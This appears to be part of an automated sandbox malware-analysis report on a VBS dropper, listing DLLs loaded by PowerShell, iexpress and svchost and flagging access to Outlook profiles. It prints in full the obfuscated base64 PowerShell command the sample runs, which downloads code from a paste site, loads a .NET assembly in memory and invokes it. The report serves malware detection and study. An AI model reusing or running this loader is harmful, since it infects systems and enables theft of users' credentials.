                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: PURCHASE OKK.vbsStatic file information: File size 35437604 > 1048576
                  Source: Binary string: iexpress.pdbGCTL source: MSBuild.exe, 0000000A.00000002.1260131610.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000002.2228533425.00000000009EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000A.00000002.1263394109.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1261140619.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1259127486.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004F2E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.1263394109.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, iexpress.exe, 0000000C.00000003.1261140619.0000000004BE7000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000003.1259127486.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2230306634.0000000004F2E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183432718.00000000003FF000.00000002.00000001.01000000.00000006.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2226912501.00000000003FF000.00000002.00000001.01000000.00000006.sdmp
                  Source: Binary string: iexpress.pdb source: MSBuild.exe, 0000000A.00000002.1260131610.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000002.2228533425.00000000009EE000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?Jw?s?C??Jw?n?D??Jw?n?Cw?I??n?Cc?MQ?n?Cc?L??g?Cc?JwB
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod(
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?